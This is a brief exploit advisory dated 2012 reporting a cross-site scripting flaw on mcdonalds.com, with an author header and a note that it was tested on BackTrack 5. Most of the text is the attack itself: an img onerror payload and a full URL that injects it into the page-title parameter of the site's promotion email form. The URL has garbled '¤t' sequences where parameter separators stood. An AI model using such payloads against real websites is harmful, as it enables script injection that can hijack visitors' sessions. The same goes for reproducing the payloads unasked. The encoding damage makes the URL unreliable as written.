Mcdonalds.com suffers from a cross site scripting vulnerability.
9645dd64740cc659afa8e577fdac2bf3473b1a0624a9e0ff8055e95dc9d564c4
# Exploit Title: mcdonalds.com Xss
# Date: 13.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
------------------------------------------------------------------
https://www.mcdonalds.com/
"><img src=x onerror=prompt(1);>
https://www.mcdonalds.com/us/en/promotions/caramel.emailform.html?currentPageUrl=http%3A%2F%2F216.255.66.122%2Fus%2Fen%2Fpromotions%2Fcaramel.html¤tPagePath=%2Fcontent%2Fus%2Fen%2Fpromotions%2Fcaramel¤tPageTitle=%22%3E%3Cimg%20src=x%20onerror=prompt%281%29;%3E